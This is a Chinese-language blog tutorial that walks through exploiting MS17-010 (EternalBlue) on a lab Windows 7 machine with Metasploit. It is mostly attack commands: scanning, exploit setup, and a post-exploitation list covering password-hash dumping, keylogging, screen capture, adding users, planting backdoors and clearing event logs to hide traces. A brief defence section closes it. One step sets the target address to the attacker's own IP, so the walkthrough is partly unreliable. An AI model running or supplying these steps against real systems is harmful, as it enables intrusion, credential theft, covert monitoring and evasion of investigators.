使用msf复现ms17-010永恒之蓝

**** 复现永恒之蓝------ms17-010****

一,环境配置:

1. kali系统(攻击机)
2.windows7(目标机)一定要确保没有安装补丁。445端口号要打开。

二,收集信息(确保属于同一网段)
1.ip地址:

攻击机:kali 192.168.43.20
目标机:win7 192.168.43.22

2. 收集方式:
获取目标机地址:192.168.43.22
我在这里用的是win7的虚拟机,查找win7的IP:按下win+R后输入cmd进入终端,输入ipconfig查看IP地址。在这里插入图片描述

获取攻击机地址:192.168.43.20
这里指kali系统的IP,在终端输入ifconfig查看。
在这里插入图片描述
检测win7的445端口号是否打开
利用nmap工具检测目标机开启了哪些端口号,我们的CVE漏洞主要利用的是445端口号。

在这里插入图片描述
二,配置ms17-010
使用 metasploit 软件利用 ms17-010 漏洞。
打开Metasploit软件,启动命令:

msfconsole

1. 进入meatsploit框架:

 msf6 > 表示成功进入

在这里插入图片描述
2. 首先查找ms17-010所有的模块

 search ms17-010

在这里插入图片描述
3.使用exploit模块

命令:
use 0
exploit/windows/smb/ms17-010

在这里插入图片描述
查看exploit攻击模块中需要设置哪些参数:

show options

在这里插入图片描述
配置目标机ip地址和端口号(必须是445 )
set RHOSTS 192.168.43.20
在这里插入图片描述

配置攻击机ip地址和端口号(随意),命令:
set LHOST 192.168.43.20

set LPORT 8893
在这里插入图片描述

在这里插入图片描述
配置目标机的系统类型。
set target 1
在这里插入图片描述
在这里插入图片描述
执行攻击:run 或者 exploit
在这里插入图片描述
在这里插入图片描述
连接成功。
在这里插入图片描述

成功后可以输入sysinfo查看目标机的系统信息。
在这里插入图片描述
三,漏洞利用:

chcp 65001										------解决乱码问题

ps												------查看目标机进程

run vnc											------监控目标机桌面

screenshot										------截取目标机屏幕

shell											------进入目标机 cmd (添加用户,修改文件,留后门。)

clearev											------清除日志(清理自己的痕迹)

getsystem  										------ 提升权限

shell     										------  进入对方的命令终端

hashdump   										------ 获取密码hash值

keyscan_start 	 								------打开记录键盘

keyscan_dump   									------记录键盘

 keyscan_stop    								------  关闭记录键盘

四,漏洞防御
• 安装杀毒软件。
• 为windows打补丁。
• 禁用SMB1协议。
• 使用防火墙设置进/出站规则,阻止445端口号的连接。

  • 6
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

柳迎枫

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值